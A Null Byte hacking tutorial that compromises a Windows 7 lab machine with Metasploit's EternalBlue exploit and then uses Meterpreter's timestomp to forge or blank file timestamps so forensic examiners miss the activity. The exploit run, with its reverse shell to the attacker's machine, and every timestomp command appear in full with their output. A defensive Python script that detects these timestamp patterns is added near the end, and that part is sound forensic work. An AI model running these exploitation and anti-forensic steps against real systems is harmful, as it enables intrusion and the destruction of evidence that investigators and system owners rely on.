
Using Metasploit's Timestomp to Modify File Attributes and Avoid Detection « Null Byte :: WonderHowTo



It is said that the best way to avoid detection when hacking is to leave no trace. Often this means not touching the file system at all, but realistically, in most cases it is impossible not to interact with the file system in one way or another. The next best thing is to change the file attributes to hide the activity, and we can do this with Metasploit's Timestomp.

What are MACE values?

MACE values (modified, accessed, created, entry modified) are file attributes that record the date and time of activity on a file. Administrators use these attributes to determine when a file was last accessed or modified, and forensic examiners often use them to track malicious activity.

The best way to hack is to leave no trace at all, but changing MACE attributes is the next best thing. This method is not infallible, but it can help hide your activity in the file system.

However, common sense must be used, since dates too far in the past (or in the future) can be a dead giveaway of tampering. Changing all four attributes to the same date and time is also a giveaway, since this is practically impossible in normal use.

Step 1: Setting Up Everything

We will be using a copy of Windows 7 as our target and Kali Linux as our attacking machine. First, we need to create some sample files on the target. I've also created a new folder named "MyFiles" to keep things tidy. It does not matter what the files are; some basic text files will be more than enough.


Step 2: Get a Meterpreter Session

Once everything is set up on the target, start Metasploit on your attacking machine by typing msfconsole in the terminal.

~# msfconsole

msf5 >

This target is vulnerable to EternalBlue, so I will use that to get a shell. However, it does not matter what you use, as long as you have a Meterpreter session on the target.

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.0.1:1234
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1234 -> 10.10.0.104:49233) at 2019-04-08 10:41:26 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

meterpreter >

Step 3: Check the Files on the Target

After the target has been compromised, enter the pwd command to display the current working directory.

meterpreter > pwd

C:\Windows\system32

Since we created a new folder on the C: drive, we can navigate there and confirm that the files we created earlier exist.

meterpreter > cd C:\Myfiles
meterpreter > ls

Listing: C:\Myfiles
===================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  12    fil   2019-04-08 12:43:24 -0500  example.txt
100666/rw-rw-rw-  7     fil   2019-04-08 12:43:55 -0500  test1.txt
100666/rw-rw-rw-  13    fil   2019-04-08 12:43:55 -0500  test2.txt
100666/rw-rw-rw-  127   fil   2019-04-08 12:43:55 -0500  test3.txt

Step 4: Modify File Attributes with Timestomp

Timestomp is a module available in Meterpreter that can change the MACE values of files. This is useful because we can change the times and dates of every file we touch to minimize the risk of getting caught.

In a Meterpreter session, use timestomp help to display the help menu for this module:

meterpreter > timestomp help

Usage: timestomp <file(s)> OPTIONS

OPTIONS:

    -a   Set the "last accessed" time of the file
    -b   Set the MACE timestamps so that EnCase shows blanks
    -c   Set the "creation" time of the file
    -e   Set the "mft entry modified" time of the file
    -f   Set the MACE of attributes equal to the supplied file
    -h   Help banner
    -m   Set the "last written" time of the file
    -r   Set the MACE timestamps recursively on a directory
    -v   Display the UTC MACE values of the file
    -z   Set all four attributes (MACE) of the file

1. Display MACE Values for a File

Specify the file and the desired option to perform an action. For example, to display the MACE values of a file, use the -v flag.

meterpreter > timestomp example.txt -v

[*] Showing MACE attributes for example.txt
Modified      : 2019-04-08 13:44:25 -0500
Accessed      : 2019-04-08 13:43:24 -0500
Created       : 2019-04-08 13:43:24 -0500
Entry Modified: 2019-04-08 13:44:25 -0500

2. Changing the Modified, Accessed, Created, and Entry Modified Values

Each of these attributes can be changed with the appropriate option and a valid DateTime format (MM/DD/YYYY HH:MM:SS, as used below). To change the "modified" value, use the -m flag.

meterpreter > timestomp example.txt -m "02/14/2012 08:10:03"

[*] Setting specific MACE attributes on example.txt

If we now look at the file attributes again, we can see that the modified value has changed.

meterpreter > timestomp example.txt -v

[*] Showing MACE attributes for example.txt
Modified      : 2012-02-14 08:10:03 -0600
Accessed      : 2019-04-08 13:43:24 -0500
Created       : 2019-04-08 13:43:24 -0500
Entry Modified: 2019-04-08 13:44:25 -0500

We can also do this for the "accessed" value by using the -a flag.

meterpreter > timestomp example.txt -a "02/14/2012 08:10:03"

[*] Setting specific MACE attributes on example.txt

And the "created" value with the -c flag.

meterpreter > timestomp example.txt -c "03/11/1999 10:05:01"

[*] Setting specific MACE attributes on example.txt

And finally the "entry modified" value using the -e flag.

meterpreter > timestomp example.txt -e "04/25/2018 11:11:08"

[*] Setting specific MACE attributes on example.txt

If we now view the file, we can see that all of these changes have taken effect.

meterpreter > timestomp example.txt -v

[*] Showing MACE attributes for example.txt
Modified      : 2012-02-14 08:10:03 -0600
Accessed      : 2012-02-14 08:10:03 -0600
Created       : 1999-03-11 10:05:01 -0600
Entry Modified: 2018-04-25 12:11:08 -0500

3. Changing All Values Simultaneously

You can also change all of these attributes at once if you want every value to be the same. Use the -z flag.

meterpreter > timestomp example.txt -z "10/15/2017 05:30:22"

[*] Setting specific MACE attributes on example.txt

And now all four values have changed again.

meterpreter > timestomp example.txt -v

[*] Showing MACE attributes for example.txt
Modified      : 2017-10-15 06:30:22 -0500
Accessed      : 2017-10-15 06:30:22 -0500
Created       : 2017-10-15 06:30:22 -0500
Entry Modified: 2017-10-15 06:30:22 -0500

4. Matching Values with Another File

There is also an interesting option to set the MACE attributes equal to those of an existing file on the system using the -f flag, but I could not get this to work.

meterpreter > timestomp example.txt -f C:\Windows\notepad.exe

[*] Getting MACE attributes for C:\Windows\notepad.exe
[-] priv_fs_get_file_mace: Operation failed: The handle is invalid.

5. Blanking All Values

With the -b flag, the file's timestamps can be blanked out entirely.

meterpreter > timestomp example.txt -b

[*] Blanking file MACE attributes on example.txt

If we now view the file, the values appear as nonsensical dates in the future, which is obviously impossible.

meterpreter > timestomp example.txt -v

[*] Showing MACE attributes for example.txt
Modified      : 2106-02-07 00:28:15 -0600
Accessed      : 2106-02-07 00:28:15 -0600
Created       : 2106-02-07 00:28:15 -0600
Entry Modified: 2106-02-07 00:28:15 -0600

With the -r flag, the MACE values of all files in the current directory can be blanked recursively.

meterpreter > timestomp ./ -r

[*] Blanking directory MACE attributes on ./

When we look at the files on the target now, the dates are displayed as empty.
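From the defender's side, the patterns this step produces are exactly what a triage script should look for. The following is an added example, not code from the original article or from Metasploit: it parses records in the layout of the timestomp -v output above and flags all four values being identical, dates in the future, dates older than the host, and the 2106 sentinel that -b leaves (0xFFFFFFFF seconds past the Unix epoch). The sample records, the triage time and the install-date floor are constructed assumptions.

```python
"""Flag the MACE timestamp patterns that timestomp leaves behind (added example).

Parses the `timestomp <file> -v` output layout shown in the article and applies the
checks the article itself hints at: future dates, identical values, backdating, -b blanking."""
from datetime import datetime, timedelta, timezone

# 2106-02-07 06:28:15 UTC is 0xFFFFFFFF seconds after the Unix epoch (the largest 32-bit
# Unix time); `timestomp -b` writes it into every field, the "future date" seen above.
BLANK_SENTINEL = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=2**32 - 1)
FIELDS = ("Modified", "Accessed", "Created", "Entry Modified")

# Constructed samples (not captured from a real host) in the -v output layout.
UNTOUCHED = """Modified      : 2019-04-08 13:44:25 -0500
Accessed      : 2019-04-08 13:43:24 -0500
Created       : 2019-04-08 13:43:24 -0500
Entry Modified: 2019-04-08 13:44:25 -0500"""
STOMPED_Z = "\n".join(f"{f:<14}: 2017-10-15 06:30:22 -0500" for f in FIELDS)
BLANKED = "\n".join(f"{f:<14}: 2106-02-07 00:28:15 -0600" for f in FIELDS)
BACKDATED = UNTOUCHED.replace("Created       : 2019-04-08 13:43:24 -0500",
                              "Created       : 1999-03-11 10:05:01 -0600")
# Analyst-supplied reference points (assumed values): the time of triage and the
# oldest plausible timestamp on the host, e.g. its OS install date.
NOW = datetime(2019, 4, 8, 14, 0, 0, tzinfo=timezone(timedelta(hours=-5)))
INSTALLED = datetime(2015, 1, 1, tzinfo=timezone.utc)


def parse_mace(output: str) -> dict:
    """Turn 'Field : YYYY-MM-DD HH:MM:SS +HHMM' lines into tz-aware datetimes."""
    mace = {}
    for line in output.splitlines():
        name, sep, value = line.partition(":")  # first colon only; the time keeps its own
        if sep and name.strip() in FIELDS:
            mace[name.strip()] = datetime.strptime(value.strip(), "%Y-%m-%d %H:%M:%S %z")
    if set(mace) != set(FIELDS):
        raise ValueError("incomplete MACE record")
    return mace


def timestomp_indicators(mace: dict, now: datetime, earliest: datetime) -> list:
    """Return why a record looks stomped; an empty list means nothing was flagged."""
    values = list(mace.values())
    reasons = []
    if all(v == BLANK_SENTINEL for v in values):
        reasons.append("all values are the 0xFFFFFFFF-second sentinel (timestomp -b)")
    elif len(set(values)) == 1:  # real activity almost never lands on one exact second
        reasons.append("all four MACE values identical to the second (timestomp -z)")
    if any(v > now for v in values):
        reasons.append("timestamp in the future")
    if any(v < earliest for v in values):
        reasons.append("timestamp predates the earliest plausible date")
    return reasons
```

Feeding the four sample records through timestomp_indicators flags everything except UNTOUCHED; the same checks apply to any tool that exports these four timestamps per file.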

Wrapping Up

Today we learned a little about the MACE values of files and their relevance to forensics. After initially compromising our target and gaining a Meterpreter session, we explored timestomp and how it can be used to change MACE attributes to avoid detection. But take it with a pinch of salt: changing file attributes is better than nothing if you are trying to hide, but it's not perfect. Stay frosty, white hats.


Cover image by Free-Photos/Pixabay; screenshots by drd_/Null Byte
